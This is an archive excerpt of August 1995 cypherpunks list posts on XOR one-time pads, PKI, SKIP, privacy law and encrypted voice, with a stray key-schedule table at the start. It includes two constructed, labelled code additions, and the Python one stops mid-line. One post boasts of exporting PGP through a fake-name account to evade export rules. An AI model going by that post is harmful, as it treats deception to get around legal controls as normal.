 O bytes| R+4  R+5 R+2  R+3  R+0  R+1   (key byte is mixed with this block byte)
 U |enc-| all  all R+6L R+6H R+7L R+7H  (output affects this byte)
 N |rypt| 0    1    2    3    4    5    (key schedule byte #)
 D |ed  |LLHH LLHH LLHH LLHH LLHH LLHH  (posn of orig key byte in sched byte)
======================================
 0  76   5831 9425 5362 4738 8492 5038 
 1  10   1497 5081 1928 0394 4058 1694 
 2  32   7053 1647 7584 6950 0614 7250 
 3  54   3619 7203 3140 2516 6270 3816 
 4  76   9275 3869 9706 8172 2836 9472 
 5  10   5831 9425 5362 4738 8492 5038 
 6  32   1497 5081 1928 0394 4058 1694 
 7  54   7053 1647 7584 6950 0614 7250 
 8  76   3619 7203 3140 2516 6270 3816 
 9  10   9275 3869 9706 8172 2836 9472 
10  32   5831 9425 5362 4738 8492 5038 	(number indicates position in schedule
11  54   1497 5081 1928 0394 4058 1694   of original key bytes; an entry
12  76   7053 1647 7584 6950 0614 7250   "5678" means key bytes 5 and 6 are
13  10   3619 7203 3140 2516 6270 3816   in the low order position of this
14  32   9275 3869 9706 8172 2836 9472   schedule entry and bytes 7 and 8
15  54   5831 9425 5362 4738 8492 5038   are in the high order position.  Bytes
16  76   1497 5081 1928 0394 4058 1694 	 are first run through an F function
17  10   7053 1647 7584 6950 0614 7250   and XORd with each other to create
18  32   3619 7203 3140 2516 6270 3816   the schedule nibble.)
19  54   9275 3869 9706 8172 2836 9472 
20  76   5831 9425 5362 4738 8492 5038 
21  10   1497 5081 1928 0394 4058 1694 
22  32   7053 1647 7584 6950 0614 7250 
23  54   3619 7203 3140 2516 6270 3816 
24  76   9275 3869 9706 8172 2836 9472 
25  10   5831 9425 5362 4738 8492 5038 
26  32   1497 5081 1928 0394 4058 1694 
27  54   7053 1647 7584 6950 0614 7250 
28  76   3619 7203 3140 2516 6270 3816 
29  10   9275 3869 9706 8172 2836 9472 
30  32   5831 9425 5362 4738 8492 5038 
31  54   1497 5081 1928 0394 4058 1694 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Sat, 12 Aug 95 11:15:53 PDT
To: cypherpunks@toad.com
Subject: Re: Stupid XOR Question
Message-ID: <199508121815.OAA19928@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 12 Aug 1995 10:05:16 -0700
>From: Anonymous User <nobody@c2.org>
>Subject: Stupid XOR Question

>ok dumb questions here.........
>
>how do i xor a simple string of plaintext?
>

In C, you open file f and

  while (((c = getc(stdin))!=EOF)&&((d = getc(f))!=EOF))
    putc(c^d, stdout) ;

If I remember correctly, Adam Back <aba@dcs.exeter.ac.uk> has a signature
block for the full C program to do this.  It's that tiny.

In a way, that program is better than RSA in 3 lines of PERL.  It's
provably unbreakable (provided the ranno source, f, is used only once and
is truly random).



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+
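
Added example, not part of Carl Ellison's message and not Adam Back's program: the same XOR loop written as a complete C program that refuses to run past the end of the pad, plus a check of what happens when the "used only once" condition in the post is violated. The function names, the sample pad and the two sample messages are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define MSG_LEN 18

/* Constructed sample data. A real pad must be truly random and used once;
 * this fixed array exists only so the example is reproducible. */
static const unsigned char SAMPLE_PAD[MSG_LEN] = {
    0x3a, 0x91, 0x5c, 0xe7, 0x08, 0xb4, 0x6d, 0x2f, 0xc3,
    0x7e, 0x15, 0xa9, 0x40, 0xdb, 0x86, 0x1c, 0xf2, 0x67
};
static const unsigned char MSG_A[MSG_LEN + 1] = "wire 100 to acct A";
static const unsigned char MSG_B[MSG_LEN + 1] = "wire 999 to acct B";

/* XOR len bytes of in with pad into out. Returns 0 on success and -1 when
 * the pad is shorter than the message, instead of truncating the output. */
int otp_xor(const unsigned char *in, size_t len,
            const unsigned char *pad, size_t pad_len, unsigned char *out)
{
    if (pad_len < len)
        return -1;
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ pad[i];
    return 0;
}

/* Stream form of the loop in the post. The two-line loop stops silently
 * when the pad file ends first; this version reports it with -1.
 * Otherwise returns the number of bytes written. */
long otp_xor_stream(FILE *msg, FILE *pad, FILE *out)
{
    long n = 0;
    int c, d;
    while ((c = getc(msg)) != EOF) {
        if ((d = getc(pad)) == EOF)
            return -1;              /* pad exhausted before the message */
        putc(c ^ d, out);
        n++;
    }
    return n;
}

/* Applying the same pad twice restores the message. Returns 1 if so. */
int roundtrip_ok(void)
{
    unsigned char ct[MSG_LEN], pt[MSG_LEN];
    otp_xor(MSG_A, MSG_LEN, SAMPLE_PAD, MSG_LEN, ct);
    otp_xor(ct, MSG_LEN, SAMPLE_PAD, MSG_LEN, pt);
    return memcmp(pt, MSG_A, MSG_LEN) == 0;
}

/* Pad reuse: count positions where c1^c2 differs from p1^p2.
 * Zero means the pad has cancelled out of the two ciphertexts entirely. */
size_t reuse_mismatches(void)
{
    unsigned char c1[MSG_LEN], c2[MSG_LEN];
    size_t bad = 0;
    otp_xor(MSG_A, MSG_LEN, SAMPLE_PAD, MSG_LEN, c1);
    otp_xor(MSG_B, MSG_LEN, SAMPLE_PAD, MSG_LEN, c2);
    for (size_t i = 0; i < MSG_LEN; i++)
        if ((c1[i] ^ c2[i]) != (MSG_A[i] ^ MSG_B[i]))
            bad++;
    return bad;
}

/* Consequence of reuse: with both ciphertexts and knowledge of message A,
 * message B follows without the pad. Returns 1 if B is reproduced. */
int reuse_leaks_second_message(void)
{
    unsigned char c1[MSG_LEN], c2[MSG_LEN], guess[MSG_LEN];
    otp_xor(MSG_A, MSG_LEN, SAMPLE_PAD, MSG_LEN, c1);
    otp_xor(MSG_B, MSG_LEN, SAMPLE_PAD, MSG_LEN, c2);
    for (size_t i = 0; i < MSG_LEN; i++)
        guess[i] = c1[i] ^ c2[i] ^ MSG_A[i];
    return memcmp(guess, MSG_B, MSG_LEN) == 0;
}

/* usage: prog padfile < input > output */
int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s padfile < input > output\n", argv[0]);
        return 2;
    }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) {
        perror(argv[1]);
        return 1;
    }
    long n = otp_xor_stream(stdin, f, stdout);
    fclose(f);
    if (n < 0) {
        fprintf(stderr, "pad exhausted: output is incomplete, discard it\n");
        return 1;
    }
    return 0;
}
```

The code cannot check the other condition in the post, that the pad is truly random; that depends entirely on where the pad file comes from.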



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 12 Aug 95 15:16:57 PDT
To: cypherpunks@toad.com
Subject: Richelson Doesn't Know C (was Re: Richelson's Latest)
Message-ID: <ac52762a060210045753@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 8/12/95, John Young wrote:
>   Jeffrey T. Richelson has a new book:
>
>   A Century of Spies: Intelligence in the Twentieth Century.
>   Oxford University Press, New York, 1995, 534 pp., $30.00.
>   ISBN 0-19-507391-6.

This is all well and good, for ciphergroupies, BUT WHAT DOES IT HAVE TO DO
WITH CODING IN C?

:-}

Seriously, I've read (or used as a reference) Richelson's books. His book
on U.S. Intelligence Agencies had a lot of good stuff on the more obscure
agencies, and is a great supplement to Bamford.

At least some cryptographers think this stuff is useful, as Whit D.
borrowed my copy for several months.

I look forward to getting this new one!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Sat, 12 Aug 95 16:46:44 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: F*** FOSTER
In-Reply-To: <199508102345.BAA14099@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.950812163257.2019A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


This Foster (And other conspiracy) BS is totally boring and old. I joined 
this list to learn 
from people how to use PGP and other crypto. I would just LOVE to learn 
how to setup PGP on WIN NT and WIN `95 for all my buddies so we can work 
towards MASS DEPLOYMENT. ANYONE who wants to talk about THAT can e-mail me at:
 ericande@linknet.kitsap.lib.wa.us
O.K. I'll admit that conspiracies ARE fun party talk, but jeez! people, it 
is getting MORE than a little stale.
P.S. Why don't we just quit monkeying around W/ this "Export PGP 3 lines 
at a time" stuff?  Just do what I do: Get  a fakename acct. @ your local 
library, UUencode the PGP.ZIP file and send it to ANYONE with a foreign 
net.tag at random. I've been doing this for about 6 weeks now and I've 
probably gotten 5 or 6 hundred copies out by now.
Love,
eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 14:45:15 PDT
To: cypherpunks@toad.com
Subject: Richelson's Latest
Message-ID: <199508122145.RAA05323@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Jeffrey T. Richelson has a new book:

   A Century of Spies: Intelligence in the Twentieth Century.
   Oxford University Press, New York, 1995, 534 pp., $30.00.
   ISBN 0-19-507391-6.

   Jacket copy: "Richelson covers the crucial role of spy
   technology from the days of Marconi and the Wright Brothers
   to today's dazzling array of Space Age satellites,
   aircraft, and ground stations. He provides portraits of
   spymasters, spies and defectors ... the 'black magic' of
   U.S. and British codebreakers. A final chapter probes the
   still-evolving role of intelligence in the new world of
   disorder and ethnic conflict, from the high-tech wonders of
   the Gulf War to the surprising involvement of the French
   government in industrial espionage."

   Blurb: "This is the missing book -- the primer -- on the
   craft of intelligence. It is a highly informed briefing,
   set in historical perspective, by the best of the spy
   watchers." -- William E. Burrows, author of "Deep Black."

   --

   Watchers of spy watchers will recall Richelson's excellent,
   "The U. S. Intelligence Community," and other fine work on
   spy satellites and Soviet intelligence.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Sat, 12 Aug 95 18:43:54 PDT
To: cypherpunks@toad.com
Subject: First Source release SKIP Implementation shows up
Message-ID: <199508130141.SAA11710@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Return-Path: skip-info@tik.ee.ethz.ch
Return-Path: <skip-info@tik.ee.ethz.ch>
Received: from ktik0 by mail4.netcom.com (8.6.12/Netcom)
	id UAA10299; Fri, 11 Aug 1995 20:12:46 -0700
Errors-To: caronni@tik.ee.ethz.ch
Reply-To: skip-info@tik.ee.ethz.ch
Originator: skip-info@tik.ee.ethz.ch
Sender: skip-info@tik.ee.ethz.ch
Precedence: bulk
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Subject: SKIP (Security on the IP Layer) Sources
X-Listprocessor-Version: 6.0c -- ListProcessor by Anastasios Kotsikonas

- -----BEGIN PGP SIGNED MESSAGE-----

Hello everybody,

the Swiss version of SKIP is now available as a pre-alpha source code release
for IRIX, NetBSD, Nextstep and Solaris.
You may get it from ftp://ktik0.ethz.ch/~ftp/pub/packages/skip.

Have fun,
    Germano


Excerpt from the README:
========================================================================
This is ENskip, pre-alpha 0.10. ENskip is a security module for the TCP/IP
stack. It provides encryption, authentication and sequencing of packets on
the IP layer between two or more machines. For more information on the SKIP
protocol, see the Internet Draft draft-ietf-ipsec-aziz-skip-00.txt and
following. You might also want to check http://skip.incog.com for information
about the background, the protocol itself and future directions of it.

ENskip is pre-alpha. If you are not absolutely sure what this is all about,
you might want to read the draft, and perhaps reconsider using this package.

No bug-fixes, installation help or any other support is granted. If you
have any suggestions, comments or contributions to make ENskip work better, 
mail to skip@tik.ee.ethz.ch.

Enjoy!

M. Hauber and Ch. Schneider
G. Caronni
=======================================================================

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 19:26:59 PDT
To: cypherpunks@toad.com
Subject: Re: Euro Comm Adopts Privacy Directive (NewsClip)
Message-ID: <199508130226.TAA11553@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 PM 8/11/95 -0500, Anonymous wrote:
>
>
> European Commission Adopts Privacy Directive
>
> Brussels, Aug. 11, -- The European Commission is now well on
> its way towards affording a high level of protection to
> personal data held on computer systems, following the formal
> adoption of a Directive on the protection of personal data,
> Newsbytes has learned.

This is an even greater threat to privacy and rights than it 
appears.  In addition to the fact that enforcing such a law in a 
world where everyone has computers would require massive 
government intrusion, one must also consider the objective, the 
intent of such a law.   The intent of course is to limit what
we are permitted to know of each other.

In a world where contracts are largely enforced by reputations, 
(for example your visa card), governments can suppress freedom of 
contract by suppressing what information is available.  For 
example bankruptcy laws that violate freedom of contract are in 
part enforced by controlling what information credit bureaus are 
permitted to keep.  Indeed such restrictions are the major goal
of existing restraints on credit bureaus.

So not only does this law require extensive violation of freedom 
and privacy, the intent is also violation of people's rights.

Both ends and the necessary means are, as usual, similar.


In the long run I do not think such laws can be effective unless 
governments use the same means to suppress privately computer 
mediated communication as the Chinese Empire used to suppress 
private paper mediated communication.  (The Chinese not only 
made paper a state monopoly, but they also castrated anyone 
with knowledge of paper making so that the knowledge would 
not be passed from father to son.)

This very vigorous enforcement did not hold back the tide for 
ever, but it held it back for a long time.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Aug 95 19:26:59 PDT
To: CypherPunks <cypherpunks@toad.com>
Subject: Re: EU Data Protection
Message-ID: <199508130226.TAA11550@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 PM 8/11/95 +0100, Derek Bell wrote:
>In message <199508041840.OAA01729@clark.net>, Ray Cromwell writes:
>	What worries me about the *lack* of some form of data protection
>legislation is that it allows someone to build up a database of information
>which is a mishmash of truth, misunderstandings and lies. How would you feel if
>"Concerned Citizens against Cryptography" compiled a list of all members
>of this list, branding them as `dangerous, possibly criminal subversives'?

It is called freedom of speech and freedom of association.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 12 Aug 95 11:26:10 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <Pine.3.89.9508121922.A25018-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Is this solely a US effort, or is any work being done outside the US ? If 
there is, I might be able to help out at least for the next couple of months.

	Mark

P.S. Thanks for your work on this, Perry...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 12 Aug 95 19:54:36 PDT
To: cypherpunks@toad.com
Subject: some points on weak codes
Message-ID: <199508130240.TAA26066@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


various points have been made about the undesirability
of weak voice scrambling mechanisms.

I'd like to advance the position that the use of trivially-broken 
codes is better than no codes at all, as long as the owner is
aware of the distinction.

one of the goals of cypherpunks is not necessarily to get a 
secure world (that is a *long* term goal), but to get a world
in which people are aware of the issues that cypherpunks are
interested in. Encryption, privacy, etc. 

now, along these lines, even a widespread trivially broken 
code penetration would be better than none at all.

this is a similar concept to that advocated by someone else
on this list, namely PRZ's manual that talks about how
you shouldn't use PGP on a shared system, and how you should
only exchange keys in person, as being a little too extreme
for the common man, for whom insecure crypto, along with
the *understanding* that it is not totally secure.

I think everyone here agrees on long term goals of widespread
encryption penetration. but one way to bridge that gap is to
just have "toy crypto". I see this derogated frequently on
the list but it is probably a very, very valuable public
relations mechanism. 

I mean, it's hard to imagine that in politics that distributing
little plastic symbols called "buttons" would have any social effect,
yet it has persisted since the invention of buttons.

things like a cheap "purple" kit, promoted by the cypherpunks, not
foolproof but easy to build and cheap to buy, would advance the
agenda in the long run in a very valuable way.

what we need to do is give people a variety of options to the
interested public laypeople, just like Ford and that anecdote demonstrates. 
are we saying, "you can have any crypto that you want, as long as the NSA 
can't break it in 1000 years"? that's the equivalent of saying, "you can 
have any car you want, as long as it's black". we must resist the
illusion that there are only 2 kinds of crypto: insecure or secure.
there is a continuum of crypto, and casual users should not have
to worry about the capabilities of the NSA. IMHO we are sabotaging
our main goals, launching into a deep discussion of the NSA's
supercomputers and the theory of numbers whenever a newbie asks about 
what is available.

again, weak crypto is probably better than no crypto in most cases,
just because it helps improve public awareness. people can't even
comprehend the idea of what is "weak" or what is "strong" until
they even have a mental framework of what they are dealing with.



~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 16:54:00 PDT
To: cypherpunks@toad.com
Subject: SOW_gut
Message-ID: <199508122353.TAA09469@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-13-95. NYPaper:


   "Not-So-Lethal Weapons: Items from the police catalogue,
   coming soon to a precinct near you."

      Cops "have the same basic options when confronting a
      Rodney King," said David Boyd of the National Institute
      of Justice. "They can talk him into cooperating, beat
      him into submission or shoot him. If they had an
      alternative to a conventional firearm, they would
      probably buy it, chortle and club him harder."

      Law engorgement is emerging as a virtually untapped
      arena for high-tech tomfoolery. Out-of-work federal
      laboratories are cooking up new Trekkie weapons. N.I.J.,
      the research honeypot of the US DoJ, has become a sort of
      Home Shopping Network for LEA's, taking their porky arms
      dreams to the desperado labs dreaming de Guerra Frio.

      The result: a host of goofy not-at-all-cheap Edsels
      and wipesnots: Sticky Foam (SNL); Rear-Seat Air Bag
      (IENL); Millimeter Wave Camera (LLNL); Smart Gun (SNL);
      Magic Fingerprinting Wand (Alaska State Crime Lab);
      Snare Net (Foster-Miller); Strobe Goggles (LLNL);
      Backscatter X-Ray Scanner.


   SOW_gut












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 22:31:15 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Significance of PGPFone?
Message-ID: <199508130528.WAA13866@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 AM 8/12/95 -0700, you wrote:
>* Finally, I have a "fax modem" on my Macintosh, as many of you do. Guess
>what? I went and got a real fax machine. Lots of reasons. First, my fax
>modem had to be installed just right...if inits or preferences got subtly
>shifted, it stopped working properly. Second, sending things was a bitch.
>(Had to have the scanner up and working, which was not often, etc.) Third,
>robustness.

We've got a box sitting next to the laser printer that receives faxes
and prints them on real paper, which is more reliable (and quieter and
lower-powered) than leaving the computer on, though it does require
leaving the printer on.  But for outgoing faxes, much of what I send
is from the computer anyway, so it's less of a problem (though, without
a scanner, I'm more likely to only fax stuff that I generated on the 
computer than drive to Kinkos...)

Perhaps we also need to build PGPfax?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Aug 95 19:52:49 PDT
To: cypherpunks@toad.com
Subject: MS BuoysTBS to Buy CBS?
Message-ID: <199508130252.WAA01288@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an amusing AP headline from 8:30 PM EDT. Anybody know 
if it's a joke, or care?


Microsoft Reportedly Considers Buying $1 Billion To $2 Billion
Stake In Turner Broadcasting; Deal Would Help Turner Make Bid
For CBS.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 12 Aug 95 22:35:24 PDT
To: cypherpunks@toad.com
Subject: IETF working to define a public key infrastructure
Message-ID: <9508130535.AA12801@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Help define the internet's web of trust model ...

>From: "warwick (w.s.) ford" <wford@bnr.ca>
Message-Id:  <"21210 Sat Aug 12 15:15:59 1995"@bnr.ca> 
To: pem-dev@tis.com, cat-ietf@mit.edu, ipsec@ans.net,
        e-payment@cc.bellcore.com, www-security@ns2.rutgers.edu,
        ietf-payments@cc.bellcore.com, pki-twg@nist.gov
Subject:  Proposal for New IETF WG on PKI 

Over the past couple of weeks, a group of interested individuals has been 
putting together a proposal for a new IETF Working Group to develop 
Internet standards for an X.509-based public-key infrastructure.  The result is 
the draft WG Charter attached below.  Since plans were announced last year to 
form this WG (and to shut down the PEM WG) it is considered reasonable to start 
up the new WG without the usual preliminary BOF at the next IETF.  Steve Kent 
and I have offered our services to co-chair this group, and Chandra Shrivastava 
has offered to run a mailing list.

The following mailing list has now been established for discussion of this 
proposal:  ietf-pkix@tandem.com.  To subscribe to the mailing list, send a 
message to listserv@tandem.com with the following in the body:
         subscribe <e-mail address> ietf-pkix

Warwick Ford
--------------------------------------------------------------------


Public-Key Infrastructure (X.509) Group
IETF Working Group Charter
---------------------------------------

Chair(s):
Applications Area Director(s)
Area Advisor:
Mailing lists:
        General Discussion:
        To Subscribe:
        In Body:
        Archive:
Description of Working Group:

Many Internet protocols and applications which use the Internet employ 
public-key technology for security purposes and require a public-key 
infrastructure (PKI) to securely deliver public keys to widely-distributed users 
or systems.  The X.509 standard constitutes a widely-accepted basis for such an 
infrastructure, defining data formats and procedures related to distribution of 
public keys via certificates digitally signed by certification authorities 
(CAs).  RFC 1422 specified the basis of an X.509-based PKI, targeted primarily 
at satisfying the needs of Internet Privacy Enhanced Mail (PEM).  Since RFC 1422 
was issued, application requirements for an Internet PKI have broadened 
tremendously, and the capabilities of X.509 have advanced with the development 
of standards defining the X.509 version 3 certificate and version 2 certificate 
revocation list (CRL).

The task of the Working Group will be to develop Internet standards needed to 
support an X.509-based PKI.  The goal of this PKI will be to facilitate the use 
of X.509 certificates in multiple applications which make use of the Internet 
and to promote interoperability between different implementations choosing to 
make use of X.509 certificates.  The resulting PKI is intended to provide a 
framework which will support a range of trust/hierarchy environments and a range 
of usage environments (RFC1422 is an example of one such model).

Candidate applications to be served by this PKI include, but are not limited to, 
PEM, MOSS, GSS-API mechanisms (e.g., SPKM), ipsec protocols, Internet payment 
protocols, and www protocols.  This project will not preclude use of 
non-infrastructural public-key distribution techniques nor of non-X.509 PKIs by 
such applications.  Efforts will be made to coordinate with the IETF White Pages 
(X.500/WHOIS++) project.

The group will focus on tailoring and profiling the features available in
the v3 X.509 certificate to best match the requirements and characteristics
of the Internet environment.

Other topics to be addressed potentially include:
- Alternatives for CA-to-CA certification links and structures, including
  guidelines for constraints
- Revocation alternatives, including profiling of X.509 v2 CRL extensions
- Certificate and CRL distribution options (X.500-based, non-X.500-based)
- Guidelines for policy definition and registration
- Administrative protocols and procedures, including certificate generation,
  revocation notification, cross-certification, and key-pair updating
- Naming and name forms (how entities are identified, e.g., email address,
  URN, DN, misc.)


Goals and Milestones:

Sep, 95   Agreement on draft Working Group charter
Nov, 95   Completion of initial strawman PKI specification
Dec, 95   First Working Group meeting (Dallas IETF) 
Jul, 96   Submit PKI (X.509) specification for
          consideration as Proposed standard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 13 Aug 95 01:13:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d01ac51ef81b1df@[192.0.2.1]>
Message-ID: <199508130813.EAA02621@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 14:42 8/11/95, Ray Cromwell wrote:
> 
> >I would like to see a secure voice communication protocol that is divorced
> >from the particular details of the algorithms used (although a
> >base level of some voice compression technique + DES + RSA will have to
> >be used) That way, new and better algorithms can be dropped in depending
> >on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
> >(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)
> 
> The codec used is at the very core of any computer telephony system. A
> standard that doesn't specify the codec(s) can be little more than a
> standard on message formats, which will be of little value if the other
> side doesn't implement the same codec.

  Uh, that's why you define a base level of support like I said. This
same argument applies to all communications technology, such as 
secure ip, e-mail standards, etc. You always have a base defined to
ensure something to fall back on. That has absolutely nothing to do
with my comments which are directed at developing an open standard
for interoperability that allows other algorithms to be used rather
than locking everyone into a particular codec. The codec is irrelevant,
it's cement in the foundation, but the design of the house is more
important to the end user. The message protocol and application
level is much more important because it controls 1) how easy
it is to create applications, and 2) how those competing
applications can interoperate with each other. This supports
a rich market with lots of interoperating "phones". On the other
hand, a poorly designed protocol will lead to a market dominated
by one or two proprietary players that is hard to upgrade
when better capabilities come out later, or new demands are made. 

  There are other reasons to abstract above codecs, for instance, a
lot of codec algorithms are patented or trademarked, so that
if a program is "welded" to any particular codec, you create hassles
for application developers who can't use non-open algorithms.

  Finally, abstracting above the codecs allows competition between
codec developers ( a sub market) whereas a design that locks in
one particular codec pretty much forces price competition
only.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 13 Aug 95 01:29:18 PDT
To: eb@comsec.com (Eric Blossom)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508112143.OAA02837@comsec.com>
Message-ID: <199508130829.EAA04681@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about tuning algorithm to channel characteristics]
> 
> None of this says that you shouldn't also optimize for the packetized
> case too.  I think that you can negotiate the right behavior at start
> up time based on detected channel characteristics.  I think that the
> biggest impact is in the framing overhead, or lack of it.
> 
> You are always trading off bandwidth, speech quality and MIPs.

 I agree with this, but it is still possible to do all this through
an abstract interface layer. One can "query the line characteristics"
of a transmission layer and then limit the selection of algorithms
based on those characteristics.

Example: we have a class TransmissionLayer, and two derived
classes "synchronouslayer" and "asynchronouslayer" (subclass as
appropriate). Note, no underlying link type is being referred
to.  It could be a network or a modem.

Now we have a bunch of algorithms (codecs), CodecA is optimized for
a synchronouslayer with at least 16kbps. CodecB for asynchronous
packet networks.

At the application layer, the user chooses a way of connecting.
The application instantly picks the best codec (supported
by both ends) for that transmissionlayer. It also updates the user
interface automatically, e.g. displaying a "half duplex"
mode for one type of link, or "conference call" for another.
Some types might not support all encryption types
because of cpu limits (also detected).  There's no reason
this could not be programmed. It would also be highly portable,
highly maintainable, and more easily adoptable.

Direct-to-hardware hardwired algorithm software is good for
proof of concept. But I'm thinking ahead, to a time when
a multimedia protocol will be just another transport layer on top of
which cool applications are running. (like http+mime runs over
TCP)

-Ray
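
[Added example, not part of the original message: the layer/codec
negotiation described above, in Python. The Endpoint type, the CPU and
quality figures, the fail-closed behaviour when no cipher is shared, and
the rule that cipher strength outranks speech quality are assumptions of
this example.]

```python
from dataclasses import dataclass
from itertools import product


class TransmissionLayer:
    """Abstract link: exposes characteristics, never the hardware behind it."""

    def __init__(self, bandwidth_bps, full_duplex=True, multiparty=False):
        self.bandwidth_bps = bandwidth_bps
        self.full_duplex = full_duplex
        self.multiparty = multiparty


class SynchronousLayer(TransmissionLayer):
    """Steady bit stream; could be a modem line or a circuit."""


class AsynchronousLayer(TransmissionLayer):
    """Packetized delivery; could be a UDP path or IPX."""


@dataclass(frozen=True)
class Codec:
    name: str
    layer_type: type  # layer class the codec is tuned for
    min_bps: int      # bandwidth the codec needs
    mips: int         # CPU cost (constructed figure)
    quality: int      # relative speech quality (constructed figure)


@dataclass(frozen=True)
class Cipher:
    name: str
    mips: int         # CPU cost (constructed figure)
    strength: int     # relative rank, higher is stronger


@dataclass(frozen=True)
class Endpoint:
    cpu_mips: int
    codecs: frozenset
    ciphers: frozenset


class NegotiationError(Exception):
    """No codec and cipher pair is usable by both ends on this link."""


def ui_mode(layer):
    """What the application shows the user for this kind of link."""
    if layer.multiparty:
        return "conference call"
    return "full duplex" if layer.full_duplex else "half duplex"


def negotiate(layer, local, remote):
    """Return (codec, cipher, ui mode) for a call over `layer`."""
    budget = min(local.cpu_mips, remote.cpu_mips)  # the slower end sets the limit
    codecs = [c for c in local.codecs & remote.codecs
              if isinstance(layer, c.layer_type)
              and c.min_bps <= layer.bandwidth_bps]
    ciphers = local.ciphers & remote.ciphers
    pairs = [(c, k) for c, k in product(codecs, ciphers)
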